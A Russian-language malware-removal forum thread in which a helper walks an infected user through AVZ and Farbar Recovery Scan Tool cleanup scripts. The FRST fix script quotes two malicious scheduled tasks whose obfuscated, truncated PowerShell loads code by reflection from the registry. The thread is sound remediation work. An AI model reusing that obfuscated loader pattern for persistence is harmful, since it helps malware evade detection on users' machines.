Перейти к содержанию
Правила раздела
17-й день рождения клуба
Пройди опрос про новый продукт, получи приз

Вирус MEM:Trojan.Win32.SEPEH.gen не лечится

Lfrog

Автор Lfrog,
в Помощь в удалении вирусов

 Share Подписчики 0

Рекомендуемые сообщения

thyrex

thyrex 1 373

Опубликовано
Опубликовано

Выполните скрипт в AVZ из папки Autologger (запускать AVZ от имени Администратора по правой кнопке мыши)

begin
 DeleteSchedulerTask('GoogleUpdateTaskMachineQC');
ExecuteSysClean;
RebootWindows(false);
end.

  • Обратите внимание: будет выполнена перезагрузка компьютера.

 

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

Ссылка на сообщение
Поделиться на другие сайты
thyrex

thyrex 1 373

Опубликовано
Опубликовано

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

Ссылка на сообщение
Поделиться на другие сайты
thyrex

thyrex 1 373

Опубликовано
Опубликовано

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
Task: {844B4E4B-E9D6-42DF-9739-5DE8824D2B8B} - System32\Tasks\dialersvc32 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов).
Task: {92684513-E26A-4623-B041-492CC9895DBC} - System32\Tasks\dialersvc64 => powershell ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+ (запись имеет ещё 256 символов).
2022-08-13 00:40 - 2022-08-13 00:40 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 394757.crdownload
2022-08-12 23:05 - 2022-08-12 23:05 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 693113.crdownload
2022-08-12 19:59 - 2022-08-12 19:59 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 294353.crdownload
2022-08-12 19:49 - 2022-08-12 19:49 - 002370048 _____ (Farbar) C:\Users\lbvfy\Downloads\Неподтверждено 865255.crdownload
2022-08-12 19:49 - 2022-08-12 19:49 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 865255.crdownload
2022-08-12 19:48 - 2022-08-12 19:48 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 967853.crdownload
2022-08-12 19:41 - 2022-08-12 19:41 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 97751.crdownload
2022-08-12 19:41 - 2022-08-12 19:41 - 000000000 _____ C:\Users\lbvfy\Downloads\Неподтверждено 904211.crdownload
Reboot:
End::


2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.


  • Обратите внимание: будет выполнена перезагрузка компьютера.


 
Ссылка на сообщение
Поделиться на другие сайты
thyrex

thyrex 1 373

Опубликовано
Опубликовано

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10/11);
  • Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
  • Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
  • Прикрепите этот файл в своем следующем сообщении.


 
Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

×
 Share
Подписчики 0
Перейти к списку тем

  • Похожий контент

    • Dmitriy12121
      Trojan.Multi.GenAutorunProc.a
      От Dmitriy12121
      Здравствуйте, хотел бы попросить помощи на форуме т.к касперский не может справиться с вирусом, вирус сам открывает рекламу (вкладки в интернете Microsoft Edge), других проблем не заметил, утилита касперского не может поймать вирус, не видит, утилита доктора веба не видит, защитник виндос не видит, касперский видит, но удалить не может, пишет обнаружено, но при других вирусах пишет либо вылечено, либо удалено, подробно: Результат: Обнаружено
      Описание результата: Обнаружено
      Тип: Троянская программа
      Название: Trojan.Multi.GenAutorunProc.a
      Точность: Точно
      Степень угрозы: Высокая
       
      У меня Windows 10 pro, не понимаю как удалить, прошу помощи.
       
      Не понял как работать с логами (я ребенок, прошу помощи, много не понимаю)
    • Salieri
      [РЕШЕНО] Trojan:Win32/Cryptinject!MTB
      От Salieri
      Здраствуйте, антивирус виндоус нашёл вирус, с любых программ удалить - невозможно.

    • igort2
      Зашифровали все файлы xhelpfile@cyberfear.com
      От igort2
      Помогите. Зашифровали все файлы.
      Систему переустановлю самостоятельно, лечение не требуется.
      FiThvDeDI.README.txt FRST.txt Addition.txt Files.rar
    • kostyan2008
      Подозрение на скрытый майнер, появление программ в автозапуске
      От kostyan2008
      Добрый день! В автозагрузке постоянно появляется Яндекс браузер, при отключении в конфигурации автозагрузок, при следующем запуске компьютера появляется снова, но уже новая задача с тем же названием YANDEX LLC. Так же на рабочем столе появляются ярлыки программ и приложений, которых я не скачивал и не устанавливал, по типу NextRP launcher или world of tanks
      CollectionLog-2023.05.20-10.57.zip
    • grayga
      скрытый майнер
      От grayga
      скачал с ноунейм торрента игру, вместе с ней скачался майнер, cureit находит 5 подозреваемых файлов, удаляет, но они появляются заного даже с выключенным интернетом, мальварбайтс, процесс хакер удалились сразу после запуска установщика игры, теперь они не скачиваются, выдают ошибку. Процесс хакер закрывается моментально, диспетчер задач выключается каждые 3 минуты, когда захожу в одну из незнаю скольких папку с майнером, она закрывается. 
×
×
  • Создать...